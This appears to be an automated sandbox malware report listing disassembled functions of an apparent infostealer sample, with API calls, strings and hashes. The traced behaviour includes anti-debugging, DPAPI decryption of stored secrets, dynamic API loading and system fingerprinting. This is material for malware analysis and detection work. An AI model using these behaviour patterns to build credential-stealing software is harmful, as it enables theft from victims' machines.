API String ID: 2008072091-2615687548
Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58

Function 00429D55 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0042E5EC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042E601
UnhandledExceptionFilter.KERNEL32(0043E074), ref: 0042E60C
GetCurrentProcess.KERNEL32(C0000409), ref: 0042E628
TerminateProcess.KERNEL32(00000000), ref: 0042E62F

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1b1fb8fedfc132813969b2cdb8563504d8e7accad777ca195f64e338567e2f38
Instruction ID: 790a93e72bbb84f86c58466f59cbf802cb39443fe5ac6c9110d3c63b658b15fc
Opcode Fuzzy Hash: 1b1fb8fedfc132813969b2cdb8563504d8e7accad777ca195f64e338567e2f38
Instruction Fuzzy Hash: EA21EFB49013959FD701EF65F8C5A663BE8FB48300F50617AE9088A772E7B499818F8D

Function 004329EE Relevance: 4.6, APIs: 3, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00433057,?,00431D9C,?,000000BC,?), ref: 00432A2D
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00433057,?,00431D9C,?,000000BC,?), ref: 00432A56
GetACP.KERNEL32(?,?,00433057,?,00431D9C,?,000000BC,?), ref: 00432A6A

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5d6b43e06ac48eaeab5c3bf4c99f1008fec33a8f7a107cd015efc394a80a7018
Instruction ID: f7b9df3e716033b58a90cc7d58479ceaa044b8ba0b495ae67d7571d083caf008
Opcode Fuzzy Hash: 5d6b43e06ac48eaeab5c3bf4c99f1008fec33a8f7a107cd015efc394a80a7018
Instruction Fuzzy Hash: F401D431A04706BFEB31EB64FE05B5F36A8AF08758F20102AF501E1192DBB8DE41965D

Function 004094C4 Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
LocalFree.KERNEL32(?), ref: 0040950A

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A

Function 00404B4C Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698

Function 0040A4A4 Relevance: 1.5, APIs: 1, Instructions: 16comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000,?,00000000,0040A52D,0041A69E), ref: 0040A4BC

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction ID: ecfa08d63a5e99a02bf1f10941cb6c6ba3816feefb3116676bc77a3be9f2b9a2
Opcode Fuzzy Hash: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction Fuzzy Hash: E5C002953917243AE551B2AA2CCAF5B418C4B88B59F214177B618F61D2A5E85C2001AE

Function 00432E78 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_00011AE3,00000001), ref: 00432E91

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 00c636353725f1962da484686480a063960c14c5634d80fee5c6b3dbfcf7b5c1
Instruction ID: edf693aabfade6f8986dd0796972b5e46aa2203ada5e98ed6e0c7391be26afeb
Opcode Fuzzy Hash: 00c636353725f1962da484686480a063960c14c5634d80fee5c6b3dbfcf7b5c1
Instruction Fuzzy Hash: 5DD05E709157408BEB204F31DA493A1BBA0EB10F25F209A9DD982485C1C3F9A48AC704

Function 00427CA1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006C5F), ref: 00427CA6

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f3d3d353f5460e81a2df8597d45737ef6fda4a7224c0e88d4ab7bb144127112c
Instruction ID: 69a14b63a2d67a8f2144ce57787bd3d3149b0dda3096d2bfa3bbaf2fdc6b73d2
Opcode Fuzzy Hash: f3d3d353f5460e81a2df8597d45737ef6fda4a7224c0e88d4ab7bb144127112c
Instruction Fuzzy Hash: 1A900270755191468A4817716D4DA052590AB497867910CA16111EC456DA5580006559

Function 0043563D Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 02ddc429cb02bd866a18ab1ddff720b286fb93f352244a513b5dd10de47944d5
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 7BC1A373D4BDB2498735462D042823FEE626ED6B4071FD396DCD43F28DC22A6D1296D8

Function 00435255 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: c4cea4521175b38a24b7b34e8429397f5bf43a9884553485ab11a26f0f39e71e
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: D6C1A273D4ADB2058B35462D042827FEEA26FD6B4171FD392DCD43F28DC22A6D1296D8

Function 00434E83 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 17195740ce09d02e5e7936acd53f7eae0f80a3c3001f78ed52e8aeb6d3e24d98
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: A5C1A373D5A9B2098B36462D042827FEEA16EC6B4071FD392CCD43F28DD62B7D1295D8

Function 00434AE5 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: a9eade919a30f646802bb3883adb71f2fc6af4575888a818f5cffaf0554c396e
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 55B1A433D4B8B2058735462D04582BFEE62AED6B4171FD3D6CCD43F289D22ABD1295D8

Function 007857E4 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 4127abdf7b9da8008a9f2c18e61219539c276977eae78527ef69dcaf7316826f
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 70F0CD77A419048FDB20EF64C845BAE73F9FB84315F5444AAE80AD7242E338A901CB90

Function 00407A34 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 0040831C Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 323libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

PATH, xrefs: 00408448, 00408470, 0040849E
%TEMP%\, xrefs: 0040838E
%appdata%\, xrefs: 004083FC

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59

Function 00408324 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 319libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

PATH, xrefs: 00408448, 00408470, 0040849E
%TEMP%\, xrefs: 0040838E
%appdata%\, xrefs: 004083FC

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59

Function 00408328 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 317libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

PATH, xrefs: 00408448, 00408470, 0040849E
%TEMP%\, xrefs: 0040838E
%appdata%\, xrefs: 004083FC

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59

Function 00417278 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

[Soft], xrefs: 004174D4
Computer(Username) : , xrefs: 00417364
, xrefs: 004172E5, 00417472, 00417490
LocalTime: , xrefs: 0041743F
EXE_PATH : , xrefs: 004172D3
Windows : , xrefs: 004172F8
Layouts: , xrefs: 0041741C
Screen: , xrefs: 004173BD
Zone: , xrefs: 00417462
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19

Function 0041727C Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

[Soft], xrefs: 004174D4
Computer(Username) : , xrefs: 00417364
, xrefs: 004172E5, 00417472, 00417490
LocalTime: , xrefs: 0041743F
EXE_PATH : , xrefs: 004172D3
Windows : , xrefs: 004172F8
Layouts: , xrefs: 0041741C
Screen: , xrefs: 004173BD
Zone: , xrefs: 00417462
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19

Function 00417290 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

